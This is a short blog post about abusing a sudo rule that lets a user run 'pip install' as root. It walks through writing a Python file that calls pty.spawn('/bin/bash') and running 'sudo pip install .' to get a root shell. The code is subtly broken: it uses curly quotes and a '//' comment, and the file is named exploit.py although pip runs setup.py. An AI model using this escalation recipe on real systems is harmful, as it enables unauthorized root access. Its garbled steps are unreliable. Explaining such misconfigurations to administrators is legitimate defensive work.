Hi All,
Today I am writting about a small mistake that system admin might do in configuring their linux system.
As usuall, After the admin configure the system they will give certain priviledge to the user to run certain command that enable to run as admin that we call it sudo. But sometimes the admin is not really careful that in order to enable let the user not bugging them too much then they just enable anything that user need without any security risk analyses.
There are alot of sudo execution that actually cannot be just given to the user because by using that command they can escalate to certain level that endanger the system
Below is one of the command that is danger to be given to the user using sudo
(root) /usr/bin/pip install *
the above command is installation manager for python package, this usually give by the admin to enable the developer user to install they addition python packages. So what is the deal ? with that command give, the user could use sudo pip <malicious_command> to do the priviledge escalation by installing malicious script
Lest do the exploitation. create a python script called exploit.py in a directory just like the below script
import pty
pty.spawn(“/bin/bash”) //create a spawn shell
and save it.
after that you can run in the directory with this command
sudo pip install .
the pip install will execute the exploit.py and run the command in the file which spawn a shell
Since the script is run in the priviledge of root then the shell that just spawned is in the root context
Soo .. now you have escallated to root.
Easy right..
This kind of mistake is just very radicolous … usually done by the lazy admin .. 🙂
Cyber Security Architect | Red/Blue Teaming | Exploit/Malware Analysis 